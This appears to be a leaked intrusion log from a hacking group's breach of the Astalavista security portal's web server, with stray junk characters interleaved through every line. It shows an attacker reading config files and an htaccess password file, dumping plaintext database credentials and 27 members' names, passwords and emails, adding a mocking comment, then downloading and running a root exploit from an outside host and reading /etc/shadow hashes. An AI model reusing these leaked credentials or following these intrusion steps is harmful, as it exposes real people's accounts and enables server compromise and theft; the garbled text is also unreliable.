0 {1 A6 [* B7 R" E& ?8 }1 r# }* I2 ftotal 200
/ ^" w! P# r: R" udrwxr-x— 29 astanet apache 4096 Jan 6 13:58 .
: J1 y7 i8 u6 P4 J0 a% L! Jdrwx–x–x 8 astanet astanet 4096 Dec 23 13:53 ..
( Z/ ~1 `/ f* S2 V8 F9 Gdrwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _0076 [3 h7 x' p# }, n
drwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql
" H: A2 n4 \2 o( V C) l7 cdrwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 链接标记astanet@astalavista.com; L% u* v; u8 ?! ?
drwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend& Q0 ^2 e3 f/ J# }4 [; P$ c
drwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner5 I2 l2 e! n) V) |* n
-rw-r–r– 1 astanet astanet 25724 Apr 4 2006 banner.jpg
0 n) W' U! A% t5 [! y- h/ X0 \drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config
1 B4 |% I& o$ Idrwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron
" E9 y. p: T( x+ K' ldrwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd1 i+ P( b* m. ~1 B
-rw-r–r– 1 astanet astanet 36 Jan 5 2006 error.php3 U$ R ^) S8 F, F3 s: l
-rw-r–r– 1 astanet astanet 1406 Jan 5 2006 favicon.ico
, T! e2 o* x2 Y1 z, ?drwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed
0 o8 P! I. y3 p4 A5 sdrwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour
6 ]7 ~* C! m& [( h8 B-rw-r–r– 1 astanet astanet 18 Jan 5 2006 htaccess, Q4 M# J2 t6 p( \
-rw-r–r– 1 astanet astanet 585 Mar 24 14:50 .htaccess
+ F9 @: j8 f+ [2 {-rw-r–r– 1 astanet astanet 398 Jan 5 2006 index1.php) s5 u+ S9 y: V1 x N0 |. k+ n$ w
-rw-r–r– 1 astanet astanet 1036 Jan 5 2006 _index.html
* q7 G& }* y; O+ ?$ z* R$ y3 a-rw-r–r– 1 astanet astanet 6880 Dec 23 14:44 index.php* G, x( r, M2 Y2 P3 C
-rw-r–r– 1 astanet astanet 676 Mar 21 2006 index_redirect.php" e2 x# v+ t* k; _7 B8 o6 Q. b
-rw-r–r– 1 astanet astanet 739 Feb 24 2006 index.swf
: N7 ^/ B6 U9 J) _drwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc
) Y2 p5 W- k" T2 o3 Z5 t% z- Edrwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang
; j8 X7 o- P2 l1 d h- Fdrwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib- z& D9 _2 U) m# n m$ J& }" l% r4 i
drwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log
- B. i5 ]) A6 B+ `' b, x6 Kdrwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member
% r& C7 c4 L- F# ]& y+ [, xdrwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata; Y6 E. X& @- O7 r: \$ j, B- r
drwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new! x8 w" w. G: J$ y) W% T$ s4 H
-rw-r–r– 1 astanet astanet 7219 Feb 24 2006 pix1.swf. F0 ]7 Z+ Z' h: W7 }/ f+ m! Y
drwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re
+ }# C) J, N, {; g-rw-r–r– 1 astanet astanet 23 Jan 5 2006 robots.txt* X& r1 h$ r" R" I# I/ x3 l n- d& Q
drwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss
' G6 U+ c9 e3 E: T2 ^1 wdrwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources
9 z c% ?9 N6 E* Z/ Idrwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com( k t; `, f. O d/ W6 q, U' N, u I
drwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes
/ p3 K! S1 s( g! U4 s+ r( E1 \drwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src" Q3 k2 S2 F! G5 F3 l
drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl
3 i# e) B+ t% Kdrwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v2
! x! l# E0 @; C4 X3 l8 I+ Kdrwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old& P8 M1 s# t1 q5 K5 _3 p, o
-rw-r–r– 1 astanet astanet 35 Dec 4 2006 webcash.php" I! I. n) X# ?5 t$ E! S3 ?! h, r4 l
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki; C! I9 f& ]* ?% ^
6 x7 ~( F+ P, z$ }$ ?5 `+ w: k
sh-3.2$ head -20 index.php# M. `6 R4 k, M$ c
<?PHP
# @& s) B$ B/ A5 u# o* r/**9 D) w7 y8 V& ~6 x1 ~7 q
* Mainfile (external) for astalavistaNET v2.07 O2 O% R: N$ A8 a" l u8 J
*/ C' c X0 K: ?0 H/ r
* @copyright Astalavista IT Engineering GmbH
% @! b, G. Q1 Q) \* @author Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>9 J& ^8 W' p! b
* @version 1.05 v. L; \ Z7 H; w$ N& R" C
*/
& t6 ] m3 S4 l4 j
8 C$ t, q" m6 e( b A2 Y if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {
- a9 k3 g" G! J) h0 Q $dontStartSession = false;
* ], h7 S$ S0 H N5 G } else {$ V4 C ?4 L5 O
$dontStartSession = true;
4 n1 D. W5 T+ w7 m4 @ }5 A. W/ j, S+ `7 T' f3 G& o
require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);
! d. S8 c; B- u; A$ W require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);; U: ^9 p$ Y$ F
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);
. w9 G* t4 s4 Y( v! i0 L) |9 M9 l require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);
6 h1 I- \$ g+ Z' q0 C D- P- @0 l# F% V( B% s
sh-3.2$ cd config
8 E' ~8 m( f) {- C' Y l% Bsh-3.2$ ls -la
1 R" L7 M* x8 T* H7 ]total 32* _% _5 \ B4 l: _
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .# |+ G$ i& L, n
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..2 [0 E4 l: F0 x; z. t% a# E
-rw-r–r– 1 astanet astanet 987 Aug 11 2006 adm.conf.php
+ X8 I- \; K+ i" v1 |4 [. Z( H-rw-r–r– 1 astanet astanet 4937 Dec 23 15:48 com.conf.php
( o; f3 @( m2 Y% c! `2 p" h) c-rw-r–r– 1 astanet astanet 913 Aug 11 2006 cron.conf.php; g$ o9 R/ K; I1 ~5 o6 k
-rw-r–r– 1 astanet astanet 1668 Aug 20 2008 ext.conf.php
& N) f# R, `4 Y-rw-r–r– 1 astanet astanet 2724 May 30 2007 int.conf.php
* o w6 A& B& c8 y0 F2 ^$ N, z& v0 z- U2 e9 A* Y1 d, e4 D
sh-3.2$ cat com.conf.php0 @7 w$ |# I& m( b- [& S: X" m+ O
[snip]
# t2 B! O, H) M9 t& | S3 o* {//member-database
1 X: J( x/ j; G9 N# F9 W# y$_CONFIG['db_mem_server'] = ‘localhost’;- n/ w" k- j& i- y8 q
$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;( }/ q Q5 p" L& Y! S" B/ h
$_CONFIG['db_mem_user'] = ‘astanet_db’;8 Q, U" t, h- H6 N9 q
$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;
9 O1 c" k% r; K4 J. p2 a, o$_CONFIG['db_mem_debug'] = false; //true or false' M% k5 G# A' O
//ads-database
. I# _ w( N2 l4 o: h0 R$_CONFIG['db_ads_server'] = ‘localhost’;; B; f3 Q9 Y/ O \3 w$ v' j' E- ^* q
$_CONFIG['db_ads_database'] = ‘astanet_ads’;
. F y( ^" X. l3 L- x$_CONFIG['db_ads_user'] = ‘astanet_db’;6 h. p8 [1 W1 k
$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;/ n' h' M7 i* D/ a; C% H* l5 b h
$_CONFIG['db_ads_debug'] = false; //true or false4 Y; M+ o$ B& ^3 G
//rainbow-database: C8 z& W: L6 {& J
$_CONFIG['db_rainbow_server'] = ‘212.254.194.163′;+ `2 O, {" N, h4 I# f2 B! i
$_CONFIG['db_rainbow_database'] = ‘rainbow’;
* e) J4 {! |' z* X- Y7 h$_CONFIG['db_rainbow_user'] = ‘dinu’;7 _9 m8 ^- M. g) T
$_CONFIG['db_rainbow_password'] = ‘dinudinu’;
2 D- F% ^* J7 W& X$_CONFIG['db_rainbow_debug'] = false; //true or false0 ]; ^8 W8 y! V3 M5 B; r, A* K- T
//mailing lists database
$ W7 Z3 L/ F6 p; D( ]' A! q0 r$ e4 M* D2 S$_CONFIG['db_mailing_lists_server'] = ‘localhost’;
- g- w4 A" \4 s- ~& Z$_CONFIG['db_mailing_lists_database'] = ‘astanet_mailing_lists’;/ F! G* U! X- O% s
$_CONFIG['db_mailing_lists_user'] = ‘astanet_db’;2 ?2 g, D& B j; S. r
$_CONFIG['db_mailing_lists_password'] = ‘TXwVrC7hbq’;( c* i2 v$ h* M2 Y2 c
$_CONFIG['db_mailing_lists_debug'] = false; //true or false
4 }) ], c' t* _. w+ M//paypal
. W) k' u" y% R! m0 Z% ?) v$_CONFIG['sub_pp_url'] = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;* _( Q# [) K+ I2 Y3 _+ b
$_CONFIG['sub_pp_cmd'] = ‘_xclick’;' [& T' g3 |( l6 F4 v
$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;
" M8 K- ?+ A: x1 ~3 O" T$_CONFIG['sub_pp_noship'] = ‘1′; j7 D0 X; q. X0 X( }# U
$_CONFIG['sub_pp_referer'] = ‘链接标记[url]https://www.paypal.com/[/url]’;
0 a& b6 N2 T3 S[snip]
7 k& c) C. A+ R/ w
$ H" @* r' q7 J7 K" B( n+ ysh-3.2$ cd ..
. J7 C3 m6 n' P6 u% gsh-3.2$ cd member
3 {/ B7 S+ P' h0 u& c# }- bsh-3.2$ ls -la
8 W3 m$ D' F, Y* n, ototal 20# c7 A8 B; `0 R/ Y5 X$ {
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .
' T6 W+ A0 [+ m3 g' Z1 N2 cdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..4 O: Q" [' w8 [% X" i0 r1 l# T' w
-rw-r–r– 1 astanet astanet 19 Jan 13 14:02 .htaccess
- I: f. Z' U$ J$ m-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php2 {, ?) w8 D; y3 Q* _
sh-3.2$ cat .htaccess7 H: b' a; |' o: E4 q
SecFilterEngine off! h# M4 _& y' y! @' j
8 B9 E# h# t& B
sh-3.2$ cd ..( h3 H9 F5 c( o* E+ E
sh-3.2$ cd cron
. n$ {4 S! N6 Hsh-3.2$ ls -la
4 [7 H7 X# v% K( _; I4 R0 ytotal 168/ h& ]7 k- ?+ Y% `
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .0 [2 ~1 q( h$ }8 O
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..% @- h4 J3 Z* T* t1 H- q, B
-rw-r–r– 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php
' r# r+ @' ?. w0 l/ x' M/ p-rw-r–r– 1 astanet astanet 2356 Aug 11 2006 0_functions.php
7 G4 F/ Z0 W b2 `7 L5 R3 T) m-rw-r–r– 1 astanet astanet 3616 Dec 23 15:44 1_daily.php3 z6 \! m5 v! L) R' w1 Z9 t
-rw-r–r– 1 astanet astanet 527 Aug 11 2006 1_fivemin.php
8 j6 W5 V6 e. f-rw-r–r– 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php
! b* M7 }( R# P! W; Y$ n; V-rw-r–r– 1 astanet astanet 432 Aug 11 2006 1_weekly.php
1 @) w4 m7 S+ c" v: z, s, n-rw-r–r– 1 astanet astanet 2277 Aug 11 2006 2_advertising.php* s$ D; n: O! g0 Z$ A1 v
-rw-r–r– 1 astanet astanet 4882 Dec 23 15:40 2_archives.php/ u- K W! X; [, G. L' B
-rw-r–r– 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh
4 j( z0 P$ Z" b2 a1 q-rw-r–r– 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php) v& n% S) F6 X7 [4 O* T
-rw-r–r– 1 astanet astanet 14979 Jan 12 09:10 2_expire.php8 n. [, @$ B. r/ w" w
-rw-r–r– 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php# F# x8 Z& {# C
-rw-r–r– 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh2 U2 \ ^+ ` B
-rw-r–r– 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php
) d& m; R# K$ {: a) d; Y-rw-r–r– 1 astanet astanet 15664 Sep 22 2006 2_keywords.php
4 a+ Y4 Z1 l5 x: V2 }-rw-r–r– 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php
2 H, S: D- e T& e( q8 y7 a0 M-rw-r–r– 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php
6 U" G% F6 r4 D+ s7 {9 }-rw-r–r– 1 astanet astanet 796 Aug 11 2006 99_create_emails.php
, J! ]( a! R) X4 }: B- B6 _3 O6 kdrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email. O7 Y0 P/ s3 V: q2 y, f
-rw-r–r– 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php, C. P9 g: E1 u4 H
-rw-r–r– 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php
3 W' G; c( t4 p$ Q8 ]: \$ ~. u: p3 w8 ^& y0 R7 s
sh-3.2$ cd ..3 V) M7 z8 M1 f
sh-3.2$ cd _0078 I' l; l( _) ?
sh-3.2$ ls -la( {3 q0 _1 b3 ]9 [
total 24
! N9 u) R1 n3 ~+ Vdrwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 .
) @4 d5 F7 q! J: d% S% ~drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
+ o5 l0 k9 [8 T$ u-rw-r–r– 1 astanet astanet 96 Dec 23 15:17 .htaccess# y' E. z! T6 G
-rw-r–r– 1 astanet astanet 3263 Jan 15 2007 index.php$ _6 e- `6 z( }' A1 J
-rw-r–r– 1 astanet astanet 20 Dec 27 2006 info.php' ~6 O8 V" j( C, u# L2 w
drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap" i7 u, P4 o7 t
" m/ D1 a5 r; P- N" Q8 psh-3.2$ cat .htaccess6 ^$ o- L! q& I8 e2 C% Z
authType Basic( b$ @9 y$ v, |( I
authName Admin
W- I R# F2 S U8 KauthUserFile /home/astanet/auth/.htadm_pwd+ f8 N% `' y+ [9 C
require valid-user5 D! T K5 t. N+ d) Q& x. _
$ T7 w% R" H* b8 rsh-3.2$ cat /home/astanet/auth/.htadm_pwd: ^$ R8 r, }6 i# G
admin2net:CR0bl65MwhfT% h& F+ a; B1 o+ O
' f5 F4 D" n! j1 u$ hsh-3.2$ mysql -u astanet_db -p) ?3 A2 \+ g' g& F) ~$ p. G y$ m1 C
Enter password:2 Q( O2 G$ l8 D& T! e; Q
Welcome to the MySQL monitor. Commands end with ; or \g.) B* y; S6 ~* z9 V/ ]$ | Q
Your MySQL connection id is 275153
0 |/ c8 Z, ]8 O# |Server version: 5.0.45-community-log MySQL Community Edition (GPL)+ e2 v& H/ g/ J7 D+ M2 E
6 V# q+ v. a( L
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
9 _; X T- _" ^
( B% g8 b/ Q/ a- [: l& ?: Nmysql> show databases;
. Q2 E; q6 l, A& _1 {+———————–+
$ j4 V' ^* E; U) J$ l| Database |
1 y% v: i" b! m" [+———————–+
7 E/ p0 L: `; |5 n/ z* g4 @| information_schema |* m& ]2 p" X1 S
| astanet_ads |6 G1 V) {( y5 x! g. m9 U% [& r) R
| astanet_mailing_lists |5 h" Q& s* l5 S: Q. h3 e0 _( x
| astanet_mediawiki |
& t8 Y! \$ o9 u5 u5 [- X% w| astanet_membersystem |8 N7 x/ o5 \$ B$ t
| test |
* P' O6 {0 z& `1 \* {+———————–+6 O% H! d0 C( `* s$ K0 D4 X. F
6 rows in set (0.00 sec)
" `. N6 S8 p* J2 r: Y! o# O
! k& | J7 e2 d. p% S3 N# K/ s- S( Dmysql> use astanet_membersystem
& y" V4 h1 r6 jDatabase changed
) U4 h" Y6 A- Nmysql> show tables;
( O( i6 U: l) v9 P! ~+———————————–+4 P" P/ @) }4 |/ f0 K9 M# x$ U! Q
| Tables_in_astanet_membersystem |
* i, ?. Z/ a2 C/ J0 P0 l+———————————–+
: S: V7 I+ l0 r8 A" m7 u/ \! K2 s) h| blacklist_categories |0 B( S0 d. ~7 Q6 k; A$ m
| blacklist_content | }" a0 D, G( H8 D+ L! Q7 {
| blacklist_levels |
9 c' [3 q+ R' d( Z9 u& C| blacklist_mcset |+ ?7 r8 Z$ Q9 b( g/ C i6 i
| dir_categories |8 T3 U) ^% ^/ y+ t9 Z/ f/ ?
| dir_comments |
$ ~0 R: Z/ z6 o6 h7 N; v| dir_links |
$ B0 K0 P l6 x% J% q3 ~| dir_temp |
0 \ J+ P% ^; E5 N) o0 K' ?8 K| dir_votes |
9 @; {" K8 W$ P& K' P| documents |3 ]* u: s7 B( R9 m/ n8 T; N% K
| documents_categories |! Q' Y. x5 X. \
| email_content |% [$ W# `% W J! U2 E. w% ~- o
| email_settings |
9 N c- Z" \$ V/ ~0 M9 w: Y| exploits |! }* B% @* h, w4 }
| exploits_categories |; ~1 y* J8 ~" D; |% N7 n9 Q
| exploittree_categories |
) J4 T7 q6 [% [# u ~' c7 B0 i| exploittree_exploits |
6 f/ r. K* K4 c% p) Y' L| home_values |+ e. k. ]. `) x# m/ ?, M! Y: A/ F
| iso_countries |
: L+ L8 K" R6 ~1 e$ w| links_categories |
3 T7 n1 |# ]' i Q U4 ^| links_records |
; q' W0 ?0 X4 K7 B| links_unauth |
1 S) g$ M: W, I9 K. M. q9 n| links_votes |
- j! f+ M; W7 n) C' f/ \1 L| log |% Y1 ?3 g1 I4 T
| news_categories |
7 ~; c. h% q9 {* Q7 O! ^. {/ T| news_comments |
# C7 `" k$ A0 X- r# p4 D| news_emoticons |" U! R( l4 L% m1 ^
| news_latest |
/ W) K0 v) X/ U( r5 U; j, t| news_messages |( K6 h9 m: i9 U
| news_statistics |1 [* U$ ~# H2 G( B
| news_votes |9 H% x1 `3 t ]$ ]4 q$ M
| prices_content |0 R5 F8 s) v4 ^; C
| prices_offers |1 p6 H/ `3 C# P4 {+ Q# Q. x$ i
| rss_settings |
* l$ Z, u( E# n) s7 X6 d# N| sessions |
) l2 F1 |/ M2 \# m% F, E| stats_signups |
& a# J1 z6 |4 J* a2 f6 s| u2u2 |
! t2 g7 d4 S& e; L- }| u2u_contact |
% P& ?" j' A2 A) || u2u_settings |
- I$ i1 B9 g- ]| user_keywords_selected_categories |
) y4 Z6 l" c4 C. U! ?9 S8 g; K| users |
& u; c( i" ]$ f; X" A| users_ipn_test |
% C' k1 v3 [* g* L& y( ~+ d| users_keyword_values |
; h# Y8 ?0 D0 G8 J. R' t! l| users_profile |
! k7 D+ `6 L* P# R r& F7 x| users_temp |: w! z# v, j! T
| users_upgrade |
+ ]/ \% b; h1 s$ @* I1 A" Y" I1 G+ c+———————————–+ o& T0 T, r. }! [% u( Z
46 rows in set (0.00 sec), c- ?5 Z; S- W1 D! T: h6 B4 ~
3 F7 y4 V9 |! X7 ] \2 ~
mysql> describe users;
; J ^% |: j; m0 n m+————————–+————————————–+——+—–+———————+—————-+
l9 {, o7 `1 Q+ a7 Y3 l| Field | Type | Null | Key | Default | Extra |
; Z4 p- d, h, _1 M& k( y+————————–+————————————–+——+—–+———————+—————-+( \9 w' M1 ]- W6 E. J) q. u7 L# T
| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |; n7 j( M7 w2 }& `
| user | varchar(50) | NO | | | |
; H6 p$ v9 H6 q2 ]| nickname | varchar(30) | NO | MUL | anonymous | |5 c6 t% S/ ^3 M6 |! v- T
| password | varchar(30) | NO | | | |
6 F) _& Z. H1 E| userlevel | tinyint(3) | YES | MUL | NULL | |
% N! r9 u$ i; k9 g, t| exp | int(8) unsigned | NO | | 0 | |
- P* n. m( c& Q: Y| email | varchar(50) | NO | | | |( A3 i! P, t% [5 [
| ip | varchar(15) | NO | | 0 | |
* z) Y( u7 c0 |- d/ o$ [| proxy | set(’0′,’1′) | NO | | 0 | |0 Q. i- [$ }! h# f# |0 M
| logtime | timestamp | NO | | CURRENT_TIMESTAMP | |
. f7 b" l6 n5 f5 c `| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |; C s% K$ T2 M: T+ j1 {/ a4 p) m
| anz_in | tinyint(1) | NO | | -1 | |
1 o( Z& e M( g! `! }6 k| status | tinyint(1) unsigned | NO | | 0 | |
; e n- P. M/ E3 i| checked | set(’0′,’1′,’2′) | NO | | 0 | | c. F- s2 D( H+ c
| freemember | set(’0′,’1′) | NO | | 0 | |
7 K) { {. }) I) O; p6 H| ordertype | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES | | NULL | |' x M7 ^0 c0 O4 ], A1 R
| lang | tinytext | NO | | | |
' B- s' g7 J& O* b; X| adid | smallint(6) | NO | | 0 | |
8 R* Q5 u$ K; [2 r5 y1 D4 V" v3 L| pp_txn_id | varchar(255) | YES | | NULL | |
) t8 j1 l# z; _- `| cnb_transaction_id | varchar(255) | YES | | NULL | |6 V" A- g* P+ K
| cnb_order_id | varchar(255) | YES | | NULL | |
6 r1 G, g7 D% q1 v| cnb_user_id | int(11) | YES | | 0 | |
& q& m, _7 q! c4 ~% R1 w0 E( T' x+————————–+————————————–+——+—–+———————+—————-+
$ b( {& [0 E7 Q- _% y: q5 h# E22 rows in set (0.01 sec)3 n w# a1 q: s: {! f
; F8 Z+ E% I O4 W1 i/ x
mysql> select count(*) as skids from users;8 W. I3 {7 M- j. {) ]- Y) U
+——-+: J% X) l7 {0 }% V2 e4 N
| skids |
7 O n4 D5 g0 t" p+——-+
9 V* v4 @3 r: i; u| 25199 |
% ?0 y1 r) o9 f3 C( Q$ I) A) ~+——-+- \" n0 z1 |8 ?7 ~6 K8 K( |$ |
1 row in set (0.00 sec)1 E- u" O7 o. J! F% b7 x/ H
1 _7 F, l+ t2 K& h# ^5 d
mysql> select user,nickname,password,email from users where userlevel = 1;- a4 z1 _5 p/ s; h( Z( j
+————————–+———————-+——————+———————————–+
% Y& h) d! s1 s4 u9 @| user | nickname | password | email |
2 D" v. ~. I; l" B: ?5 y2 j+————————–+———————-+——————+———————————–+
1 [7 Q, i( J. R8 _5 h7 r| pascal | prozac | astaman3 | 链接标记info@astalavista.net |- q1 B. _1 N8 `! ?* B* `
| Ivan Schmid | rOOtless1 | astalavista4asta | 链接标记ivan.schmid@comvation.com |" v' [/ r+ ~% B% G' m# e# ]+ g
| qreymer | Palermo | qblsw85iam | 链接标记eche@home.se |
& a# U$ z$ Y* \/ Z# O/ w# m| Christian Wehrli | g0atherd | hitt?74 | 链接标记g0atherd@gmx.net |9 _! m, Q/ X; B, h6 \) b# W
| Andrew Blake | Minky | liq73uid | 链接标记a.blake@har.mrc.ac.uk |. n+ T2 J% i, M% [, V% ~' r1 X
| Martin Wyss | dinu | kj63;cXy | 链接标记martin.wyss@astalavista.net |
' \5 R, ?8 ?$ m) R2 I' \| Leandro Nery | Timan_no_Sanco | nery2002 | 链接标记leandronery@hotmail.com |# `6 E9 J, c8 q* _: F* M& f# f
| shaving ryans privates | ShavingRyansPrivates | memberboard313 | 链接标记shavingryansprivates1@hotmail.com |
, D l0 L1 n3 s/ I| Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | 链接标记spoofedexistence@hotmail.com |
: k+ l0 O7 [$ j1 a3 Y7 k| David M Lee | Daremo | icG12m03 | 链接标记daremo@hackerheaven.com |
) R" ]- | @& ~: v| David Corn | akriel | ve3uB$cUku | 链接标记akriel@fallenroot.net |( J, E8 M. o2 H& W6 Q( ]
| Thomas Kalin | Gwanun | QwErTy123 | 链接标记thomas.kaelin@astalavista.net | W$ Q6 H `3 ~% q% A) J6 V
| Marcus unknown | Cra58cker | hhCr4ck06 | 链接标记unknownmarcus@hotmail.com |* \% h- E- [# W; p
| David Ellis | dellis203 | philip | 链接标记dellis@nightwatchnss.com |
' v" }# y- d) E3 [5 L| Lars Christian Solberg | xeor | tF3s4|Nea | 链接标记xeor@hush.com |
. @/ ]/ Z! ]7 G8 i, @| Paulo Santos | Be1er0ph0r1 | amor01 | 链接标记pmsantos@gmx.ch |1 F* P" P* R6 g1 ^0 u
| Thomas D?ppen | daha | asta4tom | 链接标记thomas.daeppen@astalavista.ch |3 T# j* {8 [6 Y' c$ @: G
| Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | 链接标记toraj.a.m@gmail.com |4 G! c. [6 D% f/ T$ p! |
| Fabius Bernet | traviser | wellenreiter100 | 链接标记fabius.bernet@astalavista.ch |, ~( K3 |5 e$ y3 _
| Zachary McElroy | duder1 | dirty245dix | 链接标记mcelroyzj@yahoo.com |
v: g7 l! w) L& l. a! U, N| Leron Cohen | cohen2 | leron4free | 链接标记leron@quiredmedia.com |% U1 C, h# m5 u. X _7 ?* j
| Beatriz Pontes | anonymous1656 | pitas | 链接标记joao.pedro.pontes@gmail.com |$ B4 k7 E; }% V
| Glafkos Charalambous | anonymous2086 | si99490178$# | 链接标记nowayout@webhostline.com |1 |. {* F. t" V6 J% |# U @0 R
| developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | 链接标记ivan.schmid@astalavista.ch |
: F4 G$ X. K: s4 X| Peter Fisher | cyph3r1 | testZer025435 | 链接标记cyph3r@astalavista.com |
( k2 i+ N, x Z+ G| sykadul | sykadul | ak29eral | 链接标记sykadul@gmail.com |4 d# X% \6 L/ Y- B
| Ronny Janzi | commander1 | mpbdaagf6m | 链接标记ronny.janzi@astalavista.ch |* Q' V5 a! ?0 i' Z" O! V7 H
+————————–+———————-+——————+———————————–+& f l4 Q \4 K; K
27 rows in set (0.00 sec)
! P6 n: K& e3 ^# K& z, m- Z, u$ A- l/ F
mysql> exit;0 d3 C6 ^! F# M- G9 Y0 y, h' e
Bye$ m r; a& m+ T. B) q
# {& y8 V/ h# K& h[~] plaintext passwords? yes,
' E5 g. D8 `' O% XThose so called “security professionals” who charge you $6.66 / month to
. F5 C2 \3 f% ?. i" Jregister at their hack-proof portal, save your passwords in plaintext…
, }( {# N3 u0 o7 u9 z+ xbrilliant!3 j/ B) b: Y$ c: w& a+ |5 B' ~5 u8 l
$ o9 m% e }4 I- {[~] This been fun but we want more.1 V/ `7 H9 }% e
+ D' H6 q3 a, F" |sh-3.2$ uname -a
2 k& q- }3 R- e+ d7 dLinux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux0 ~; e. E, C3 N. Z1 U( \( e4 S" F7 g
sh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]$ r A( Q/ B3 _9 S
–13:33:37– 链接标记[url]http://anti.sec.labs/g0troot[/url]
1 K1 o* r& K5 _' LResolving anti.sec.labs… 13.33.33.37
: \/ Z, r2 x% ^- e' xConnecting to anti.sec.labs|13.33.33.37|:80… connected./ |$ M; u/ i( ]6 \5 B
HTTP request sent, awaiting response… 200 OK
# g0 o$ j+ f7 _, z% mLength: 18200 (18K) [text/plain]
% u2 g" K: @( i8 kSaving to: `g0troot’3 y7 @- |) i$ |, \' Y
1 I& M# ?- U! B* t4 Q- M" ~+ H6 N100%[=========================================================================================================================================>] 18,200 58.6K/s in, o* u) o! w3 a: J! F1 n3 }
0.3s9 B: p. j* E% F& s s: }
, y+ _- O g" `) p7 c e
18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]4 Q R- W- \7 g L
9 Y$ z- |- c# k* g* g
sh-3.2$ ./g0troot -i x86_64
8 Q- \! G6 Y5 `! k$ j: [1 Z[+] g0troot - anti.sec.labs1 P) z$ h0 t5 q- m3 \& U0 _1 X
[+] Target: 2.6.18-128.1.10.el57 e9 L0 b4 \. h
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
1 `8 a4 J5 R7 o& ?
: o$ Q; @: i* ?) _2 \" A$ ^& t& C3 o[+] r00tr00t
0 w1 E& r) o; K4 r[~] Executing shell…- F: A6 l4 W3 W$ [4 W; L
; D+ o8 Z; s+ Z( M4 K p$ J
sh-3.2# id* k \" t0 s' ^% b; W% V
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) R2 k( W/ y. ^3 H. Y6 J
! l7 r5 g- u% N; x6 Ysh-3.2# cat /etc/shadow
' l4 y( b' r" n2 V5 y6 }3 m6 Droot 1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::
% |/ j' T, F- b4 A[snip]4 k1 o1 {3 M3 Q* b0 I% P
admin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::- z3 i& \* T$ p0 ?$ o
